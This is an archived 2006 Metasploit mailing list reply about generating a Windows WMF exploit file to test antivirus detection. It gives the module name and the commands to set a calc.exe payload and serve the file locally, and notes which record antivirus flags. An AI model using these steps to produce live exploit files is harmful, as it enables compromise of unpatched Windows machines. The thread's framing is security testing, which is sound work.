Metasploit mailing list archives
Best way to capture the wmf file generated by the framework?
From: solata10 at yahoo.com (solata)
Date: Sun, 8 Jan 2006 07:26:38 -0800 (PST)
--- odinanne <odinanne at comcast.net> wrote:
I tested a number of system using the calc.exe file referenced in an earlier post and AV quickly detected it. Is it true that metasploite generated wmfs are not likely to be detected due to the random padding,
its true that metasploit generates random WMF, but it still needs to inclue ESCAPE function with SET_ABORT_PROC, and seems that av detects that in particular, so even if you generate wmf with metasploit it'll still get detected.
etc. Is it possible to use the framework to create a new wmf file to test AV? If yes, how would this be done? Thanks
sure its possible, try reading metasploit documentation ... basicly you need these commands : use ie_xp_pfv_metafile set PAYLOAD win32_exec set CMD calc.exe exploit then go on http://localhost:8080/file.tiff with mozilla firefox and save it to disk (if you use ie, file will be auto opened).
__________________________________________ Yahoo! DSL ? Something to write home about. Just $16.99/mo. or less. dsl.yahoo.com
Current thread:
- Best way to capture the wmf file generated by the framework? odinanne (Jan 07)
- Best way to capture the wmf file generated by the framework? solata (Jan 08)